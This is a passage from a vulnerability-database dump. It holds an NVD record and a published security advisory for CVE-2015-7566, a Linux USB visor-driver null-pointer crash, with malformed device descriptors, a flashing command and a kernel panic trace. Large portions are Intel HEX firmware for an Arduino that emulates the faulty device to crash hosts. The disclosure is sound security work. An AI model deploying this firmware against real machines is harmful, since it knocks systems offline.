F900F90E1CF81E194E09F93F2\r\n:100DE0008F930E9483060F900F900F900F90DF91CA\r\n:100DF000CF911F910F91FF90EF90DF90CF90BF9018\r\n:100E0000AF909F908F900895F8940C94E809AEE00D\r\n:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8\r\n:100E20004C831A83098377FF02C060E070E8615049\r\n:100E300071097E836D83A901BC01CE0101960E94D8\r\n:100E400033074D815E8157FD0AC02F8138854217D7\r\n:100E500053070CF49A01F801E20FF31F10822E964B\r\n:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB\r\n:100E7000B1097C016B018A01FC0117821682838112\r\n:100E800081FFBDC1CE0101964C01F7019381F601AE\r\n:100E900093FD859193FF81916F01882309F4ABC184\r\n:100EA000853239F493FD859193FF81916F018532ED\r\n:100EB00029F4B70190E00E941B09E7CF512C312C97\r\n:100EC00020E02032A0F48B3269F030F4803259F007\r\n:100ED000833269F420612CC08D3239F0803339F4CB\r\n:100EE000216026C02260246023C0286021C027FD25\r\n:100EF00027C030ED380F3A3078F426FF06C0FAE00C\r\n:100F00005F9E300D1124532E13C08AE0389E300DA1\r\n:100F10001124332E20620CC08E3221F426FD6BC1C9\r\n:100F2000206406C08C3611F4206802C0883641F473\r\n:100F3000F60193FD859193FF81916F018111C1CFDE\r\n:100F4000982F9F7D9554933028F40C5F1F4FFFE33B\r\n:100F5000F9830DC0833631F0833771F0833509F0A2\r\n:100F60005BC022C0F801808189830E5F1F4F44243B\r\n:100F70004394512C540115C03801F2E06F0E711CDE\r\n:100F8000F801A080B18026FF03C0652D70E002C08B\r\n:100F90006FEF7FEFC5012C870E9410092C018301A0\r\n:100FA0002C852F77222E17C03801F2E06F0E711CAE\r\n:100FB000F801A080B18026FF03C0652D70E002C05B\r\n:100FC0006FEF7FEFC5012C870E9405092C012C854E\r\n:100FD0002068222E830123FC1BC0832D90E048163D\r\n:100FE0005906B0F4B70180E290E00E941B093A94E0\r\n:100FF000F4CFF50127FC859127FE81915F01B701B0\r\n:1010000090E00E941B0931103A94F1E04F1A510808\r\n:101010004114510471F7E5C0843611F0893639F571\r\n:10102000F80127FF07C060817181828193810C5F85\r\n:101030001F4F08C060817181882777FD8095982FA8\r\n:101040000E5F1F4F2F76B22E97FF09C090958095A7\r\n:10105000709561957F4F8F4F9F4F2068B22E2AE089\r\n:1010600030E0A4010E944D09A82EA81844C085377D\r\n:1010700029F42F7EB22E2AE030E025C0F22FF97F2E\r\n:10108000BF2E8F36C1F018F4883579F0B4C08037A0\r\n:1010900019F0883721F0AFC02F2F2061B22EB4FE97\r\n:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D\r\n:1010B0009660B92E06C028E030E005C020E130E09F\r\n:1010C00002C020E132E0F801B7FE07C06081718103\r\n:1010D000828193810C5F1F4F06C06081718180E027\r\n:1010E00090E00E5F1F4FA4010E944D09A82EA81882\r\n:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428\r\n:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0\r\n:101110007A2C2B2D03C07A2C01C0752C24FF0DC016\r\n:10112000FE01EA0DF11D8081803311F4297E09C092\r\n:1011300022FF06C07394739404C0822F867809F04E\r\n:10114000739423FD13C020FF06C05A2C731418F4A7\r\n:10115000530C5718732C731468F4B70180E290E0B5\r\n:101160002C870E941B0973942C85F5CF731410F4FF\r\n:10117000371801C0312C24FF12C0B70180E390E082\r\n:101180002C870E941B092C8522FF17C021FF03C05A\r\n:1011900088E590E002C088E790E0B7010CC0822F9C\r\n:1011A000867859F021FD02C080E201C08BE227FD64\r\n:1011B0008DE2B70190E00E941B09A51438F4B70135\r\n:1011C00080E390E00E941B095A94F7CFAA94F4019F\r\n:1011D000EA0DF11D8081B70190E00E941B09A1106A\r\n:1011E000F5CF332009F451CEB70180E290E00E94A0\r\n:1011F0001B093A94F6CFF7018681978102C08FEFE1\r\n:101200009FEF2C96E2E10C94CD09FC010590615012\r\n:1012100070400110D8F7809590958E0F9F1F08950C\r\n:10122000FC016150704001900110D8F780959095B5\r\n:101230008E0F9F1F08950F931F93CF93DF93182F47\r\n:10124000092FEB018B8181FD03C08FEF9FEF20C041\r\n:1012500082FF10C04E815F812C813D814217530770\r\n:101260007CF4E881F9819F012F5F3F4F3983288308\r\n:10127000108306C0E885F985812F0995892B29F708\r\n:101280002E813F812F5F3F4F3F832E83812F902FF1\r\n:10129000DF91CF911F910F910895FA01AA2728306D\r\n:1012A00051F1203181F1E8946F936E7F6E5F7F4F33\r\n:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF\r\n:1012C000781F891F9A1FA11D680F791F8A1F911D02\r\n:1012D000A11D6A0F711D811D911DA11D20D009F452\r\n:1012E00068943F912AE0269F11243019305D319394\r\n:1012F000DEF6CF010895462F4770405D4193B3E07D\r\n:101300000FD0C9F7F6CF462F4F70405D4A3318F023\r\n:10131000495D31FD4052419302D0A9F7EACFB4E0D4\r\n:10132000A6959795879577956795BA95C9F700978C\r\n:101330006105710508959B01AC010A2E069457952D\r\n:10134000479537952795BA95C9F7620F731F841F84\r\n:10135000951FA01D0895EE0FFF1F0590F491E02D3D\r\n:1013600009942F923F924F925F926F927F928F9249\r\n:101370009F92AF92BF92CF92DF92EF92FF920F9324\r\n:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E\r\n:10139000F894DEBF0FBECDBF09942A8839884888EB\r\n:1013A0005F846E847D848C849B84AA84B984C88481\r\n:1013B000DF80EE80FD800C811B81AA81B981CE0F78\r\n:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D\r\n:0413D000F894FFCFBF\r\n:1013D4001201000200000040AD0BEFBE000101024B\r\n:1013E4000001220342006100640020004200410029\r\n:1013F40042004500250078002500780025006E0095\r\n:1014040025007000180342004100440020004300FE\r\n:10141400300046004600450045002100120100024C\r\n:10142400000000404C0544010001010203010902CF\r\n:10143400270001010000FA0705810104040C0705D7\r\n:10144400010104000C0705820104000C07000700D9\r\n:101454000700480100500072006F006C00690066CC\r\n:101464000069006300000A550000006BFD180A00C3\r\n:10147400809F0AB901312B940A8101128946001315\r\n:10148400000257028B0A5E0AF80A5F01F212010099\r\n:1014940002010000400D055702000101020301B9D9\r\n:1014A4000A0100F80A5F0A810A220342006100640B\r\n:1014B400002000420041004200450025007800253C\r\n:1014C40000780025006E00250070001803420041DA\r\n:1014D400004400200043003000460046004500451B\r\n:1014E40000210012010002010000400D0557020016\r\n:1014F400010102030109040000030100000003F2DA\r\n:101504000AEC0A0902270001010000FA01AB0A09EA\r\n:101514000400000301000000090200202020202014\r\n:101524005F5F5F5F5F5F5F5F2020202020202020BF\r\n:1015340020202020202020202020202020202020A7\r\n:1015440020205F5F5F5F5F205F5F20205F2020209F\r\n:101554002020205F5F0A0D00202020202F205F5FC5\r\n:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3\r\n:101574005F5F20205F5F5F5F5F20202020202F209F\r\n:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3\r\n:10159400202F5F5F0A0D002020202F202F202020E5\r\n:1015A4002F205F5F205C2F205F5F20602F205F5F14\r\n:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A\r\n:1015C400205C2F205F5F2F202F205F5F5F2F202F55\r\n:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009\r\n:1015E4002F202F202F202F5F2F202F202F5F2F2001\r\n:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0\r\n:101604002F202F5F2F202F202F5F5F2F202C3C0AAD\r\n:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07\r\n:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F\r\n:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4\r\n:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044\r\n:101654003C3C2043485241534820414E59204F506E\r\n:1016640045524154494E472053595354454D203E09\r\n:101674003E0A0D00203C3C202863292053657267F4\r\n:10168400656A20536368756D696C6F20323031353B\r\n:101694002C204F70656E536F7572636520536563BC\r\n:1016A40075726974792052616C66205370656E6E30\r\n:1016B4006562657267203E3E0A0D000A3E3E205078\r\n:1016C4007265737320627574746F6E20746F207307\r\n:1016D4007461727420657865637574696F6E2E2EFB\r\n:1016E4002E0A0D005B44454255475D2045786563ED\r\n:1016F400757465207061796C6F616420300A0D0027\r\n:10170400526563762D446174613A0A0D005B444569\r\n:101714004255475D200953656E6420436F6E6669C8\r\n:101724006775726174696F6E44657363726970740E\r\n:101734006F720928696E6465783A2569292E2E2E00\r\n:101744000D0A005B44454255475D200953656E64AC\r\n:1017540020496E74657266616365204465736372C3\r\n:101764006970746F720928696E7465726661636565\r\n:101774003A2569292E2E2E0D0A005B444542554711\r\n:101784005D200953656E6420456E64706F696E74E4\r\n:101794002044657363726970746F720928656E649E\r\n:1017A400706F696E743A2569292E2E2E0D0A005B1E\r\n:1017B40044454255475D203C3C70616E6963206D31\r\n:1017C4006F64653F3E3E0D0A005B44454255475DEC\r\n:1017D4002009203E3E20537472696E67204465736D\r\n:1017E40063726970746F72207265717565737420A9\r\n:1017F4002D2073656E64696E67206D616C666F720F\r\n:101804006D656420737472696E67212073657475E5\r\n:10181400702E7756616C75654C203D3D2025690D11\r\n:101824000A005B48455844554D505D0A0D0025306B\r\n:041834003258200006\r\n:00000001FF\n\n# 0day.today [2018-03-14] #", "_state": {"dependencies": 1659994789, "score": 1683967709, "epss": 1678853679}, "_internal": {"score_hash": "4843be007e99cf13f67dfef6045ad7b1"}}
{"cve": [{"lastseen": "2023-08-13T13:29:28", "description": "The clie_5_attach function in drivers/usb/serial/visor.c in the Linux kernel through 4.4.1 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a bulk-out endpoint.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-08T03:59:00", "type": "cve", "title": "CVE-2015-7566", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7566"], "modified": "2018-10-09T19:58:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_debuginfo:11", "cpe:/a:novell:suse_linux_enterprise_software_development_kit:11", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:11", "cpe:/o:novell:suse_linux_enterprise_server:11", "cpe:/o:linux:linux_kernel:4.4.1", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12"], "id": "CVE-2015-7566", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7566", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_debuginfo:11:sp4:*:*:*:*:*:*", "cpe:2.3:a:novell:suse_linux_enterprise_software_development_kit:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11:sp4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11:extra:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:12:45", "description": "", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "packetstorm", "title": "Linux visor clie_5_attach Null Pointer Dereference", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7566"], "modified": "2016-03-09T00:00:00", "id": "PACKETSTORM:136141", "href": "https://packetstormsecurity.com/files/136141/Linux-visor-clie_5_attach-Null-Pointer-Dereference.html", "sourceData": "`OS-S Security Advisory 2016-09 \nLinux visor clie_5_attach Nullpointer Dereference \n \nDate: March 4th, 2016 \nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg \nCVE: CVE-2015-7566 \nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) \nTitle: Local RedHat Enterprise Linux DoS \u2013 RHEL 7.1 Kernel crashes on invalid \nUSB device descriptors (visor clie_5_attach driver) \nSeverity: Critical. The Kernel panics. A reboot is required. \nEase of Exploitation: Trivial \nVulnerability type: Wrong input validation \nProducts: RHEL 7.1 including all updates \nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) \nVendor: Red Hat \nVendor contacted: November, 12th 2015 \nPDF of advisory: https://os-s.net/advisories/OSS-2016-09_visor_clie_5_attach.pdf \n \nAbstract: \nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB \ndevice requiring the visor (clie_5_attach) driver. \n \nDetailed product description: \nWe confirmed the bug on the following system: \nRHEL 7.1 \nKernel 3.10.0-229.20.1.el7.x86_64 \nFurther products or kernel versions have not been tested. \nHow reproducible: Always \nActual results: Kernel crashes. \n \nDescription: \nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \n(github.com/schumilo) using the following device descriptor: \n \n[*] Device-Descriptor \nbLength: 0x12 \nbDescriptorType: 0x1 \nbcdUSB: 0x200 \nbDeviceClass: 0x3 \nbDeviceSubClass: 0x0 \nbDeviceProtocol: 0x0 \nbMaxPacketSize: 0x40 \nidVendor: 0x54c \nidProduct: 0x144 \nbcdDevice: 0x100 \niManufacturer: 0x1 \niProduct: 0x2 \niSerialNumbers: 0x3 \nbNumConfigurations: 0x1 \n \n \n \nThe clie_5_attach function of the visor driver, which is called during the \ndriver initialization process, expects an OUT-Bulk-Endpoint. \nDue to an incomplete sanity check, the visor driver tries to dereference null- \npointers. \nThis results in a crash of the system. \n \n \n \n \n**** \n$ nm visor.ko.debug | grep clie_5_attach \n0000000000000030 t clie_5_attach \n$ addr2line -e visor.ko.debug 6d \n/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_64/drivers/usb/serial/visor.c:610 \n**** \n \n**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/visor.c) \n... \n607 \n608 pipe = usb_sndbulkpipe(serial->dev, port->bulk_out_endpointAddress); \n609 for (j = 0; j < ARRAY_SIZE(port->write_urbs); ++j) \n610 port->write_urbs[j]->pipe = pipe; /* if there is no configured OUT- \nbulk-endpoint, the kernel tries to dereference null-pointers */ \n611 \n612 return 0; \n613 } \n... \n**** \n \n \n[*] Configuration-Descriptor \nbLength: 0x9 \nbDescriptorType: 0x2 \nwTotalLength: 0x27 \nbNumInterfaces: 0x1 \nbConfigurationValue: 0x1 \niConfiguration: 0x0 \nbmAttributes: 0x0 \nbMaxPower: 0x31 \n[*] Interface-Descriptor \nbLength: 0x9 \nbDescriptorType: 0x4 \nbInterfaceNumber: 0x0 \nbAlternateSetting: 0x0 \nbNumEndpoints: 0x3 \nbInterfaceClass: 0x0 \nbInterfaceSubClass: 0x0 \nbInterfaceProtocol: 0x0 \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x81 \uf0df IN-Direction \nbmAttribut: 0x1 \uf0df ISO-Transfer \nwMaxPacketSize: 0x404 \nbInterval: 0xc \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x1 \uf0dfOUT-Direction \nbmAttribut: 0x1 \uf0dfISO-Transfer (change this \nvalue to 0x2, which is the value for bulk-transfer without additional \nfeatures, and the visor driver won't crash) \nwMaxPacketSize: 0x4 \nbInterval: 0xc \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x82 \uf0dfIN-Direction \nbmAttribut: 0x1 \uf0dfISO-Transfer \nwMaxPacketSize: 0x4 \nbInterval: 0xc \n \nProof of Concept: \nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \nfirmware will emulate the defective USB device. \n \n \navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \nflash:w:binary.hex \n \n \nThe firmware has been attached to this bug report. \nTo prevent the automated delivery of the payload, a jumper may be used to \nconnect port D3 and 3V3! \n \nSeverity and Ease of Exploitation: \nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \nonly physical access to the system is required. \n \nVendor Communication: \nWe contacted Red Hat on the November, 12th 2015. \nThis bug was fixed upstream. A CVE number was not assigned. \n \nReferences: \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283371 \nhttp://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cb3232138e37129e88240a98a1d2aba2187ff57c \n \n \nKernel Stacktrace: \n \n \n[ 34.568077] usb 1-1: new full-speed USB device number 2 using xhci_hcd \n[ 34.791731] usb 1-1: New USB device found, idVendor=054c, idProduct=0144 \n[ 34.795463] usb 1-1: New USB device strings: Mfr=1, Product=2, \nSerialNumber=3 \n[ 34.799619] usb 1-1: Product: \u0109 \n[ 34.804592] usb 1-1: Manufacturer: \u0109 \n[ 34.810144] usb 1-1: SerialNumber: % \n[ 34.872285] usbcore: registered new interface driver visor \n[ 34.879838] usbserial: USB Serial support registered for Handspring Visor / \nPalm OS \n[ 34.890481] usbserial: USB Serial support registered for Sony Clie 5.0 \n[ 34.897769] usbserial: USB Serial support registered for Sony Clie 3.5 \n[ 34.914162] visor 1-1:1.0: Sony Clie 5.0 converter detected \n[ 34.920288] BUG: unable to handle kernel NULL pointer dereference at \n0000000000000058 \n[ 34.921136] IP: [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor] \n[ 34.921136] PGD 0 \n[ 34.921136] Oops: 0002 [#1] SMP \n[ 34.921136] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT \nxt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables \nip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle \nip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat \nnf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack \niptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm \nppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 \ni2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif \ncdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy \ndm_mirror dm_region_hash dm_log dm_mod \n[ 34.921136] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted \n3.10.0-229.14.1.el7.x86_64 #1 \n[ 34.921136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 \n[ 34.921136] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 \n[ 34.921136] RIP: 0010:[<ffffffffa039306d>] [<ffffffffa039306d>] \nclie_5_attach+0x3d/0x60 [visor] \n[ 34.921136] RSP: 0018:ffff88000bd23a80 EFLAGS: 00010286 \n[ 34.921136] RAX: 00000000c0000200 RBX: ffff88000af979d0 RCX: 0000000000000000 \n[ 34.921136] RDX: ffff88000be6b000 RSI: ffff88000af979c0 RDI: ffff88000af979c0 \n[ 34.921136] RBP: ffff88000bd23a80 R08: 0000000000000000 R09: 0000000000000000 \n[ 34.921136] R10: 0000000000000000 R11: ffff88000c3b9800 R12: ffff88000af979d0 \n[ 34.921136] R13: ffff88000c525830 R14: ffff88000af979c0 R15: ffffffffa0395200 \n[ 34.921136] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \nknlGS:0000000000000000 \n[ 34.921136] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b \n[ 34.921136] CR2: 0000000000000058 CR3: 000000000d2a1000 CR4: \n00000000000006f0 \n[ 34.921136] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \n0000000000000000 \n[ 34.921136] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 \n[ 34.921136] Stack: \n[ 34.921136] ffff88000bd23c18 ffffffff8145fed1 0000000000000007 000000020bd23af8 \n[ 34.921136] ffff88000c525830 0000000000000000 0000000000000000 ffffffff00000000 \n[ 34.921136] ffff88000bcd0000 ffff880000000001 ffff88000bcd0090 0000000000000000 \n[ 34.921136] Call Trace: \n[ 34.921136] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230 \n[ 34.921136] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0 \n[ 34.921136] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0 \n[ 34.921136] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0 \n[ 34.921136] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100 \n[ 34.921136] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0 \n[ 34.921136] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390 \n[ 34.921136] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0 \n[ 34.921136] [<ffffffff813d3420>] ? __device_attach+0x40/0x40 \n[ 34.921136] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0 \n[ 34.921136] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20 \n[ 34.921136] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580 \n[ 34.921136] [<ffffffffa0398000>] ? 0xffffffffa0397fff \n[ 34.921136] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor] \n[ 34.921136] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230 \n[ 34.921136] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40 \n[ 34.921136] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0 \n[ 34.921136] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150 \n[ 34.921136] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0 \n[ 34.921136] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b \n[ 34.921136] Code: 28 48 8b 57 20 0f b6 80 28 02 00 00 88 82 28 02 00 00 48 \n8b 0f c1 e0 0f 0d 00 00 00 c0 8b 09 c1 e1 08 09 c8 48 8b 8a 10 02 00 00 <89> \n41 58 48 8b 92 18 02 00 00 89 42 58 31 c0 5d c3 66 90 b8 ff \n[ 34.921136] RIP [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor] \n[ 34.921136] RSP <ffff88000bd23a80> \n[ 34.921136] CR2: 0000000000000058 \n[ 35.341720] ---[ end trace b239663354a1c556 ]--- \n[ 35.347341] Kernel panic - not syncing: Fatal exception \n[ 35.348314] drm_kms_helper: panic occurred, switching back to text console \n \n \n \nArduino Leonardo Firmware: \n \n:100000000C94A8000C94C5000C94C5000C94C50079 \n:100010000C94C5000C94C5000C94C5000C94C5004C \n:100020000C94C5000C94C5000C94C4050C942F04CA \n:100030000C94C5000C94C5000C94C5000C94C5002C \n:100040000C94C5000C94C5000C94C5000C94C5001C \n:100050000C94C5000C94C5000C94C5000C940E02C1 \n:100060000C94C5000C94C5000C94C5000C94C500FC \n:100070000C94C5000C94C5000C94C5000C94C500EC \n:100080000C94C5000C94C5000C94C5000C94C500DC \n:100090000C94C5000C94C5000C94C5000C94C500CC \n:1000A0000C94C5000C94C5000C94C5000B030E0302 \n:1000B000010305032F032F032F03120316031A0353 \n:1000C000200324032F032A030000000200080E006F \n:1000D00000030401000B000000000000000000000D \n:1000E00000000000000004080201104080401020C1 \n:1000F00040804080080204018040201002011080EE \n:100100001020404004040404040304050202020217 \n:1001100004030202020206060606060604040202A0 \n:100120000204000000002300260029002C002F00FC \n:1001300000000000250028002B002E0031000000E8 \n:100140000000240027002A002D00300000C180811B \n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 \n:10016000B1E0E4EDF3E102C005900D92A436B107D1 \n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C \n:10018000E1F70E94C8000C9404070C940000089545 \n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 \n:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B \n:1001B00083E00E94300361E087E00E94300361E049 \n:1001C00088E00E9430030E9459067E012AE9E20E6F \n:1001D000F11C84E093E0D70111969C938E9389E003 \n:1001E00094E013969C938E93129782E2E2E1F1E001 \n:1001F0009E012F5F3F4F6901D90101900D928A95B1 \n:10020000E1F788E1E4E3F1E0DE01939601900D92DD \n:100210008A95E1F782E1ECE4F1E0DE01DB96019002 \n:100220000D928A95E1F789E0EEE5F1E0DE01A05953 \n:10023000BF4F01900D928A95E1F72A593F4F99E0FF \n:10024000992ED901E92D1D92EA95E9F78E010957FA \n:100250001F4F87E0E7E6F1E0D80101900D928A9503 \n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 \n:1002700001900D928A95E1F7AE0147585F4F87E0F4 \n:10028000E5E7F1E0DA0101900D928A95E1F75E0170 \n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D \n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 \n:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 \n:1002C0009C92F4E01196FC9311971496EC93F9012B \n:1002D000DC01292D01900D922A95E1F7FE01EC56E3 \n:1002E000FF4FDC011B96FC93EE931A971D96BC9270 \n:1002F000AE921C971183008373836283558344837A \n:100300000C5211092CE0F80111922A95E9F721E02D \n:10031000D80119962C931997FE01E059FF4F0190CF \n:100320000D929A94E1F7F8019387828761E088E063 \n:100330000E9469038BE492E00E94650688E892E0DF \n:100340000E94650687EC92E00E94650686E093E0D5 \n:100350000E94650682E493E00E9465068FE793E0C1 \n:100360000E94650684EA93E00E9465068BEE93E0A6 \n:100370000E94650683E00E949F03892B09F047C015 \n:100380005E01F3E2AF0EB11C8824839482E1982EC3 \n:1003900084E194E00E946506BF92AF92DF92CF9213 \n:1003A000FF92EF921F928F921F930F932DB73EB73C \n:1003B000225131090FB6F8943EBF0FBE2DBFADB725 \n:1003C000BEB71196FE01FB96892D01900D928A957C \n:1003D000E1F78DE695E00E94030668E873E180E0AE \n:1003E00090E00E947B028DE695E00E944E0660E060 \n:1003F00087E00E94690368E873E180E090E00E9472 \n:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E \n:1004100070E080E090E00E947B02ACCF1F920F92D0 \n:100420000FB60F9211242F933F938F939F93AF9307 \n:10043000BF938091650590916605A0916705B09185 \n:1004400068053091640523E0230F2D3720F40196D1 \n:10045000A11DB11D05C026E8230F0296A11DB11DE7 \n:10046000209364058093650590936605A0936705C6 \n:10047000B09368058091690590916A05A0916B051C \n:10048000B0916C050196A11DB11D809369059093F3 \n:100490006A05A0936B05B0936C05BF91AF919F91D6 \n:1004A0008F913F912F910F900FBE0F901F90189535 \n:1004B0003FB7F8948091690590916A05A0916B050A \n:1004C000B0916C0526B5A89B05C02F3F19F0019689 \n:1004D000A11DB11D3FBF6627782F892F9A2F620F6C \n:1004E000711D811D911D42E0660F771F881F991FA6 \n:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 \n:10050000DF936B017C010E945802EB01C114D104FE \n:10051000E104F10479F00E9458026C1B7D0B683EE7 \n:100520007340A0F381E0C81AD108E108F108C8516E \n:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 \n:100540000895789484B5826084BD84B5816084BD4B \n:1005500085B5826085BD85B5816085BDEEE6F0E03C \n:10056000808181608083E1E8F0E010828081826098 \n:100570008083808181608083E0E8F0E08081816019 \n:100580008083E1E9F0E08081826080838081816006 \n:100590008083E0E9F0E0808181608083E1ECF0E03D \n:1005A000808184608083808182608083808181609B \n:1005B0008083E3ECF0E0808181608083E0ECF0E018 \n:1005C000808182608083E2ECF0E0808181608083C2 \n:1005D000EAE7F0E0808184608083808182608083AC \n:1005E000808181608083808180688083089590E02D \n:1005F000FC013197EE30F10590F5EA5AFF4F0C946B \n:10060000AB09809180008F7703C0809180008F7D3F \n:1006100080938000089584B58F7702C084B58F7D64 \n:1006200084BD0895809190008F7707C080919000DD \n:100630008F7D03C080919000877F80939000089504 \n:100640008091C0008F7703C08091C0008F7D809320 \n:10065000C00008958091C200877F8093C2000895F2 \n:10066000CF93DF9390E0FC01EA51FF4F2491FC010E \n:10067000EC5FFE4F8491882349F190E0880F991F29 \n:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 \n:10069000C591D4919FB7611108C0F8948C912095B1 \n:1006A00082238C93888182230AC0623051F4F894AB \n:1006B0008C91322F309583238C938881822B888371 \n:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 \n:1006D00008950F931F93CF93DF931F92CDB7DEB78B 